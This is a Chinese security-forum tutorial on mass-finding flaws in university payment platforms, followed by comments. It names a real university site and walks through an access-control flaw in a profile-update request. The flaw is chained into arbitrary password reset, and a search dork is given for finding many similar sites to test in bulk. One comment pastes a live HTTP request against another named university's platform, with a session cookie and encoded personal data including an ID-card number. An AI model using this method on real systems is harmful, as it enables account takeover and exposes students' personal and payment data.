大家好,我是Yaoヽ药药
这段时间总群里老是有朋友问我怎么挖edu的
挖不动edu漏洞, 今天我就教大家如何批量挖edu漏洞
0x01
首先我们通过搜索引擎搜集一下链接
site:edu.cn 缴费
我这个人很贪财所以 关键词为”缴费”
这里可以看到一个电子科技大学缴费平台
url:http://cwjf.uestc.edu.cn/payment 电子科技大学缴费平台
0x02
这里我注册了两个账号
账号1 user=vcevce pass=vce123~!
账号2 user=vcevce1 pass=vce123~!
登录上后,点击修改个人信息 然后抓包 可以看到参数中包含我们的账号啊?
尝试修改一下,把账号修改成vcevce1 身份证号码修改成test 然后放包
提示修改成功或者提示1 便是修改成功 的确存在越权
放包后切换到vcevce1 看下
可以看到越权成功
0x03
现在看一下忘记密码的界面
可以看到忘记密码只需要身份证号与用户名便可以忘记密码
这里可以利用越权漏洞来修改指定账号的身份证号码 然后在忘记密码
越权漏洞 -> 复现任意账号重置密码 -> 高危
0x04
既然这个链接存在平行越权+任意账号重置密码
那么我们试试批量?
site:edu.cn inurl:/payment intitle:大学缴费平台
利用此语法在搜索引擎搜索
可以看到很多这样的站, 然后每一个都看一下此漏洞是否还存在
实现批量
此操作视频教程地址:
链接:https://pan.baidu.com/s/19gAv8QPxMc8GnH_m9uq2lw
提取码:u6yh
从前有个小伙伴,看完文章不点赞,从此变成短小快~~~
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
Track-聂风 | 100.00 | 0 | 2020-06-03 19:07:50 | 欠你100金币,补偿给你 |
piao | 4.00 | 0 | 2020-04-23 21:09:18 | 一个受益终生的帖子~~ |
piao | 8.00 | 0 | 2020-04-23 21:09:17 | 一个受益终生的帖子~~ |
奖励系统 | 100.00 | 0 | 2020-04-20 16:04:44 | 投稿满 10 赞奖励 |
奖励系统 | 50.00 | 0 | 2020-04-15 16:04:41 | 投稿满 5 赞奖励 |
admin | 50.00 | 0 | 2020-04-13 15:03:50 | 内容完善一些会更好 |
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
ancnhehe
发表于 2020-4-22
1
评论列表
加载数据中...
炮炮兵
发表于 2020-4-22
111111
评论列表
加载数据中...
yeison
发表于 2020-4-22
2
评论列表
加载数据中...
小飞
发表于 2020-4-22
1
评论列表
加载数据中...
小飞
发表于 2020-4-22
这个洞没了,看不到用户了
POST /payment/pay/userinfo_updateUserinfo.action HTTP/1.1
Host: pay.ujs.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/plain, /; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 149
Origin: http://pay.ujs.edu.cn
Connection: close
Referer: http://pay.ujs.edu.cn/payment/pay/userinfo_userinfoLink.action
Cookie: JSESSIONID=5546F0A36F87DE1000816307AFE5C167; JSESSIONID=46E76E2FFAE4A78DDC093EA19EE6277A
username=aGFja2VyMQ%3D%3D&sex=55S3&idcardno=MzMwMzAyMTk2NDA3MDc2NTEw&phone=&company=&email=MzI0MzI1MzQ1QHFxLmNvbQ%3D%3D&birthday=MTk2NC0wNy0wNw%3D%3D
评论列表
加载数据中...
渗透你的美
发表于 2020-4-22
1
评论列表
加载数据中...
1125305002
发表于 2020-4-22
1
评论列表
加载数据中...
383479438
发表于 2020-4-22
111
评论列表
加载数据中...
wufan
发表于 2020-4-22
1
评论列表
加载数据中...
330085193
发表于 2020-4-22
11
评论列表
加载数据中...
白鸽
发表于 2020-4-22
1
评论列表
加载数据中...
w1272471736
发表于 2020-4-22
1
评论列表
加载数据中...
乐伟超
发表于 2020-4-23
药水
评论列表
加载数据中...
小黑飞了
发表于 2020-4-23
1
评论列表
加载数据中...
dl
发表于 2020-4-23
6666666
评论列表
加载数据中...
墨染
发表于 2020-4-23
1
评论列表
加载数据中...
piao
发表于 2020-4-23
1
评论列表
加载数据中...
nandisec
发表于 2020-4-23
1233
评论列表
加载数据中...
新手小张zz
发表于 2020-4-23
qiangqiangqinag
评论列表
加载数据中...
qwe123
发表于 2020-4-24
1123
评论列表
加载数据中...